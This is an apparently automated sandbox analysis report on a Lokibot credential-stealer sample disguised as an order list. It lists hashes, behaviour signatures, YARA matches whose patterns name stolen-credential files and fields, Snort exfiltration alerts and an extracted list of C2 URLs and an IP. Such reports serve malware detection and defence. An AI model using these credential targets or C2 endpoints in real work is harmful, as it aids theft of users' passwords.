Edit tour

Windows Analysis Report
ORDER LIST790.exe

Overview

General Information

Sample Name:	ORDER LIST790.exe
Analysis ID:	682143
MD5:	80e4b72d26806ed5f245142166a48145
SHA1:	c07deb8c6fc551636d842c18d0540594afbe1c68
SHA256:	c5847da2de3c9aee81dc121287bb4c4c366d8c978f604cac6e19f80da1a46094
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Lokibot

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

ORDER LIST790.exe (PID: 980 cmdline: "C:\Users\user\Desktop\ORDER LIST790.exe" MD5: 80E4B72D26806ED5F245142166A48145)

ORDER LIST790.exe (PID: 1672 cmdline: C:\Users\user\Desktop\ORDER LIST790.exe MD5: 80E4B72D26806ED5F245142166A48145)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://66.29.145.162/?112233"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17658:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4a23:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13267:$des3: 68 03 66 00 00 0x17658:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17724:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x73430:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x6030f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x6eb53:$des3: 68 03 66 00 00 0x73430:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x734fc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1a638:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7a03:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x16247:$des3: 68 03 66 00 00 0x1a638:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1a704:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: ORDER LIST790.exe PID: 980	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ORDER LIST790.exe PID: 980	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ORDER LIST790.exe PID: 980	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: ORDER LIST790.exe PID: 980	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2ba5e:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x3f9ee:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xba291:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: ORDER LIST790.exe PID: 1672	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ORDER LIST790.exe PID: 1672	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: ORDER LIST790.exe PID: 1672	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5f69:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ORDER LIST790.exe.4726268.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.ORDER LIST790.exe.4726268.9.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.4726268.9.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.4726268.9.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.4726268.9.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.ORDER LIST790.exe.4726268.9.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ORDER LIST790.exe.470c248.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.ORDER LIST790.exe.470c248.8.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.470c248.8.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.470c248.8.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.470c248.8.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.ORDER LIST790.exe.470c248.8.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.0.ORDER LIST790.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
4.0.ORDER LIST790.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ORDER LIST790.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.0.ORDER LIST790.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.0.ORDER LIST790.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
4.0.ORDER LIST790.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.0.ORDER LIST790.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.0.ORDER LIST790.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.0.ORDER LIST790.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.ORDER LIST790.exe.470c248.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.ORDER LIST790.exe.4726268.9.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x455bc:$s1: http:// 0x48d77:$s1: http:// 0x497d0:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x455c4:$s2: https:// 0x455bc:$f1: http:// 0x48d77:$f1: http:// 0x455c4:$f2: https://
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x47c7a:$f1: FileZilla\recentservers.xml 0x47cba:$f2: FileZilla\sitemanager.xml 0x45f2a:$b2: Mozilla\Firefox\Profiles 0x45c94:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x45e3e:$s4: logins.json 0x46ce8:$s6: wand.dat 0x45768:$a1: username_value 0x45758:$a2: password_value 0x45da3:$a3: encryptedUsername 0x45e10:$a3: encryptedUsername 0x45db6:$a4: encryptedPassword 0x45e24:$a4: encryptedPassword
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x48b34:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x35a13:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x454f8:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x45740:$a2: last_compatible_version
0.2.ORDER LIST790.exe.37298fc.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x44257:$des3: 68 03 66 00 00 0x48b34:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x48c00:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x32124:$s1: http:// 0x358df:$s1: http:// 0x36338:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x3212c:$s2: https:// 0x32124:$f1: http:// 0x358df:$f1: http:// 0x3212c:$f2: https://
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x347e2:$f1: FileZilla\recentservers.xml 0x34822:$f2: FileZilla\sitemanager.xml 0x32a92:$b2: Mozilla\Firefox\Profiles 0x327fc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x329a6:$s4: logins.json 0x33850:$s6: wand.dat 0x322d0:$a1: username_value 0x322c0:$a2: password_value 0x3290b:$a3: encryptedUsername 0x32978:$a3: encryptedUsername 0x3291e:$a4: encryptedPassword 0x3298c:$a4: encryptedPassword
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3569c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2257b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x32060:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x322a8:$a2: last_compatible_version
0.2.ORDER LIST790.exe.373cd94.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x30dbf:$des3: 68 03 66 00 00 0x3569c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x35768:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3e370:$s1: http:// 0x41b2b:$s1: http:// 0x42584:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x3e378:$s2: https:// 0x3e370:$f1: http:// 0x41b2b:$f1: http:// 0x3e378:$f2: https://
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x40a2e:$f1: FileZilla\recentservers.xml 0x40a6e:$f2: FileZilla\sitemanager.xml 0x3ecde:$b2: Mozilla\Firefox\Profiles 0x3ea48:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3ebf2:$s4: logins.json 0x3fa9c:$s6: wand.dat 0x3e51c:$a1: username_value 0x3e50c:$a2: password_value 0x3eb57:$a3: encryptedUsername 0x3ebc4:$a3: encryptedUsername 0x3eb6a:$a4: encryptedPassword 0x3ebd8:$a4: encryptedPassword
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x418e8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2e7c7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x3e2ac:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x3e4f4:$a2: last_compatible_version
0.2.ORDER LIST790.exe.3730b48.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x3d00b:$des3: 68 03 66 00 00 0x418e8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x419b4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 61 entries

Snort Signatures

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249741802024317 08/11/22-05:37:23.228158
SID:	2024317
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249743802024318 08/11/22-05:37:28.256446
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249742802024312 08/11/22-05:37:26.351786
SID:	2024312
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249742802021641 08/11/22-05:37:26.351786
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249743802024313 08/11/22-05:37:28.256446
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249742802024317 08/11/22-05:37:26.351786
SID:	2024317
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249741802024312 08/11/22-05:37:23.228158
SID:	2024312
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249741802021641 08/11/22-05:37:23.228158
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 66.29.145.162

Timestamp:	192.168.2.366.29.145.16249743802021641 08/11/22-05:37:28.256446
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://66.29.145.162/?112233"]}

Source: ORDER LIST790.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ORDER LIST790.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49741 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49741 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 66.29.145.162:80
